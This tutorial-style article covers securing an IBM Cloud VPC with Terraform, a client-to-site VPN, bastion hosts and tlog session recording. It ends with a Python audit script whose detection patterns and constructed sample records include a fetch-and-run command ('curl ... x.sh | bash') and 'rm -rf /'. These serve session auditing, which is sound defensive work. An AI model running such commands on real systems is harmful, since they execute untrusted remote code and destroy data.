In today's cloud world, security matters at least as much as resiliency and high availability. With the introduction of Virtual Private Cloud (VPC) networking, network security has become even more critical, because the network boundary is now something you define yourself. In this article, you will learn best practices that make a virtual private cloud more private and secure than a default deployment.
By the end of this article, you will have explored best practices for designing and securing a Virtual Private Cloud (VPC) network in the cloud, and deployed one yourself.
By following these best practices, you can create a highly secure and resilient VPC. Review and update your security measures regularly to adapt to evolving threats and keep your cloud infrastructure protected. Automating the deployment with tools like Terraform makes the configuration repeatable and consistent, so the security controls are applied the same way every time.
This article uses IBM Cloud to deploy the VPC network using Terraform as the infrastructure as code automation. You can use any cloud provider to deploy the architecture as VPC is available on all the leading cloud vendors for network isolation.
Client-to-site VPN for VPC is one of the two VPN options available on IBM Cloud. It lets users connect from their own machines to IBM Cloud resources through secure, encrypted tunnels; in the architecture deployed here, it is the only way into the private network.
● An IBM Cloud API key to provision cloud resources.
● The CRN of the VPN server certificate stored in IBM Cloud Secrets Manager; the client-to-site VPN reads its certificates from there.
● The OpenVPN client on your local machine, to connect to the client-to-site VPN.
● Terraform installed and set up locally.
export TF_VAR_ibmcloud_api_key=<IBM_CLOUD_API_KEY>
export TF_VAR_secrets_manager_certificate_crn=<SECRET_CRN>
git clone https://github.com/VidyasagarMSC/private-vpc-network
cd private-vpc-network/terraform
terraform init
terraform plan
terraform apply
● Once the VPC resources are successfully provisioned, download the VPN client profile from the IBM Cloud console.
● Click the Client-to-site tab and then the name of the VPN.
● Download the profile from the Clients tab.
● The VPN provisioned through Terraform authenticates clients with certificates. Follow IBM Cloud's instructions for the OpenVPN client to import the profile and connect.
● You should see a successful connection in your OpenVPN client.
4. Verify the SSH Connection
ssh-add <LOCATION_OF_PRIVATE_SSH_KEY>
Example: ssh-add ~/.ssh/<NAME_OF_THE_PRIVATE_KEY>
Connect to the RHEL VSI (10.10.128.13) through the bastion host in Zone 1 (10.10.0.13). The -J (ProxyJump) option tunnels the second SSH connection through the first, so you authenticate to the RHEL VSI end to end and your private key stays on your machine; no agent forwarding is needed:
ssh -J root@10.10.0.13 root@10.10.128.13
To connect through the bastion host in Zone 2 instead:
ssh -J root@10.10.65.13 root@10.10.128.13
Remember, you must be connected to the client-to-site VPN to SSH into the RHEL VSI through a bastion host. To verify this, disconnect the VPN and run the same ssh command again: it should fail, because the bastion hosts have no public IP address and are reachable only over the VPN.
A bastion host and a jump server are both control points for reaching remote systems: instead of exposing every server, you expose one hardened host and route all SSH sessions through it. The two terms are often used interchangeably; "bastion host" usually means a deliberately hardened host at the network edge, while "jump server" means any intermediate host used to hop between network segments. A conventional bastion host sits in front of the private network, accepts SSH from the public internet and forwards the sessions to downstream machines, which is exactly why bastion hosts and jump servers are prime targets for intrusion. In the architecture deployed here, the bastion hosts have no floating IP and are reachable only from clients connected to the client-to-site VPN, so they are not exposed to public traffic at all.
Session recording lets an administrator audit user SSH sessions and meet regulatory requirements. After a security breach, you need to reconstruct exactly what each user did in their sessions; for a security-sensitive system this record is critical, and it is most valuable on the hosts every session passes through: the bastion hosts.
Before deploying the session recording solution, provision the private VPC network as described above. Alternatively, if you plan to use your own VPC infrastructure, you need to attach a floating IP to the virtual server instance and a public gateway to each of the subnets, and allow the required network traffic from the public internet.
To deploy the session recording solution, the following packages need to be installed on the RHEL VSI:
● tlog, the terminal session recorder
● cockpit-session-recording, the Cockpit web console module for browsing and replaying recordings
● systemd-journal-remote, for forwarding the journal (where tlog stores the recordings) to a remote collector
The packages are installed through Ansible automation on all the VSIs, both the bastion hosts and the RHEL VSI.
1. Change into the ansible directory of the cloned repository.
cd ansible
2. Create hosts.ini from the template file.
cp hosts_template.ini hosts.ini
3. Edit hosts.ini: set the private IPs of your bastion hosts and RHEL VSI, the path to your private SSH key, and the bastion that Ansible should use as the SSH jump host for the servers group. The inventory used in this article:
[bastions]
10.10.0.13
10.10.65.13
[servers]
10.10.128.13
[bastions:vars]
ansible_port=22
ansible_user=root
ansible_ssh_private_key_file=/Users/vmac/.ssh/ssh_vpc
packages="['tlog','cockpit-session-recording','systemd-journal-remote']"
[servers:vars]
ansible_port=22
ansible_user=root
ansible_ssh_private_key_file=/Users/vmac/.ssh/ssh_vpc
ansible_ssh_common_args='-J root@10.10.0.13'
packages="['tlog','cockpit-session-recording','systemd-journal-remote']"
4. Run the Ansible playbook. It installs the packages on all hosts from the IBM Cloud private mirror/repository, so the instances do not need public internet access; the servers group is reached through the Zone 1 bastion via the ansible_ssh_common_args jump setting.
ansible-playbook main_playbook.yml -i hosts.ini --flush-cache
After you SSH into the RHEL machine, the login messages now include a note that the current session is being recorded.
If you look closely at the messages after login, you will also see a URL to the Cockpit web console, reachable on the machine name or private IP over port 9090. To allow traffic on port 9090, change the value of the allow_port_9090 variable in the Terraform code to true and run terraform apply again; this adds the network ACL and security group rules for port 9090. Check that those rules permit 9090 only from the VPN client address range and not from the public internet, since the console gives a browser-based terminal on the host.
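Recording sessions is only half of the job; the value comes from being able to reconstruct them after an incident. The following Python script is an added example, not code from the article or from the tlog project: it replays tlog's JSON records offline to recover the exact command lines a user typed (handling Backspace and Ctrl-C, so an aborted command is not reported as run) and flags risky ones. The sample records, host names and risky-command patterns are constructed for illustration; on a real host you would feed it the records tlog writes to the journal. The timing-string event letters it relies on (+, =, <, >, [ and ]) are tlog's documented record format.

```python
"""Offline audit of tlog session recordings, the recorder this article installs.
Each tlog JSON record holds what the user typed ("in_txt"), what the terminal
showed ("out_txt") and a "timing" string interleaving both with delays and
resizes; replaying it recovers the exact command lines, corrections included."""
import re
from collections import defaultdict

# Timing events: +N ms elapsed | =WxH resize | <N chars of in_txt typed |
# >N chars of out_txt shown | [M/N and ]M/N binary input/output (invalid UTF-8).
EVENT_RE = re.compile(r"([+=<>\[\]])(\d+)(?:x(\d+)|/(\d+))?")

# Illustrative patterns an auditor might flag; extend for your environment.
RISKY_PATTERNS = [
    (re.compile(r"^\s*sudo\b|^\s*su\b"), "privilege escalation"),
    (re.compile(r"\brm\s+-[a-zA-Z]*[rR]"), "recursive delete"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b"), "remote script piped into a shell"),
    (re.compile(r"authorized_keys|\b(useradd|usermod|passwd)\b"), "account or SSH key change"),
]


def replay_record(rec):
    """Yield (kind, payload) events from one record; reject binary events
    rather than silently dropping data the auditor would want to see."""
    timing, in_txt, out_txt = rec["timing"], rec.get("in_txt", ""), rec.get("out_txt", "")
    in_pos = out_pos = pos = 0
    while pos < len(timing):
        m = EVENT_RE.match(timing, pos)
        if m is None:
            raise ValueError(f"malformed timing at offset {pos}: {timing!r}")
        pos, kind, n = m.end(), m.group(1), int(m.group(2))
        if kind == "+":
            yield "delay_ms", n
        elif kind == "=":
            yield "resize", (n, int(m.group(3)))
        elif kind == "<":
            yield "input", in_txt[in_pos:in_pos + n]
            in_pos += n
        elif kind == ">":
            yield "output", out_txt[out_pos:out_pos + n]
            out_pos += n
        else:
            raise ValueError(f"binary event {kind!r} in record {rec.get('id')} not handled")


def _stream(records, wanted):
    """Concatenate payloads of one event kind across a recording, in "id" order."""
    return "".join(p for rec in sorted(records, key=lambda r: r["id"])
                   for kind, p in replay_record(rec) if kind == wanted)


def typed_commands(records):
    """Reconstruct the command lines typed during one recording. Enter ends a
    line, Backspace (DEL/BS) drops the last character and Ctrl-C discards the
    line, so "rm -rf /" followed by Ctrl-C is not reported as executed."""
    commands, line = [], []
    for ch in _stream(records, "input"):
        if ch in "\r\n":
            if line:
                commands.append("".join(line))
            line = []
        elif ch in "\x7f\x08":
            if line:
                line.pop()
        elif ch == "\x03":
            line = []
        else:
            line.append(ch)
    return commands


def terminal_output(records):
    """Everything the user saw, in order, for replay or keyword search."""
    return _stream(records, "output")


def audit_records(records):
    """Group records by recording id ("rec") and return, per recording, the user,
    host, reconstructed commands and findings as (command, [reasons])."""
    by_rec = defaultdict(list)
    for rec in records:
        by_rec[rec["rec"]].append(rec)
    report = {}
    for rec_id, recs in by_rec.items():
        commands = typed_commands(recs)
        findings = [(c, why) for c in commands
                    if (why := [r for p, r in RISKY_PATTERNS if p.search(c)])]
        report[rec_id] = {"user": recs[0]["user"], "host": recs[0]["host"],
                          "commands": commands, "findings": findings}
    return report


# Constructed sample records in tlog's JSON layout (not real captures): alice on
# the RHEL VSI (note the backspace \x7f) and bob on a bastion host (Ctrl-C \x03).
SAMPLE_RECORDS = [
    {"host": "rhel-vsi", "rec": "rec-alice-7", "user": "alice", "id": 1,
     "timing": "=80x24<6+120>9", "in_txt": "ls -l\r", "out_txt": "total 0\r\n"},
    {"host": "rhel-vsi", "rec": "rec-alice-7", "user": "alice", "id": 2,
     "timing": "+3000<8+40<13>6", "in_txt": "sudo rmx\x7f -rf /tmp/x\r", "out_txt": "done\r\n"},
    {"host": "rhel-vsi", "rec": "rec-alice-7", "user": "alice", "id": 3, "timing": "+500<38+900>4",
     "in_txt": "curl -s http://10.10.0.50/x.sh | bash\r", "out_txt": "ok\r\n"},
    {"host": "bastion-zone1", "rec": "rec-bob-9", "user": "bob", "id": 1,
     "timing": "=120x40<9+200<5>8", "in_txt": "rm -rf /\x03exit\r", "out_txt": "logout\r\n"},
]

if __name__ == "__main__":
    for rec_id, r in audit_records(SAMPLE_RECORDS).items():
        print(rec_id, r["user"], "@", r["host"], r["findings"])
```

Run it as is to see alice's session flagged twice (the corrected sudo rm -rf and the curl-to-bash) while bob's aborted rm -rf / is correctly not reported. Binary events raise instead of being skipped on purpose: in an audit, a record you could not fully replay should be a visible gap, not a silent one.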
This article covered why session recording is required on bastion hosts for auditing and compliance, and how to set it up with the built-in RHEL packages using Ansible automation.
In designing a secured virtual private cloud network, you learned best practices for architecting a private VPC network, and why the VPN servers and bastion hosts are deployed for high availability across zones. By provisioning the cloud infrastructure with Terraform and configuring session recording with Ansible, you got hands-on experience with both.
If you like my content, please check my website and give a follow on LinkedIn. Happy reading.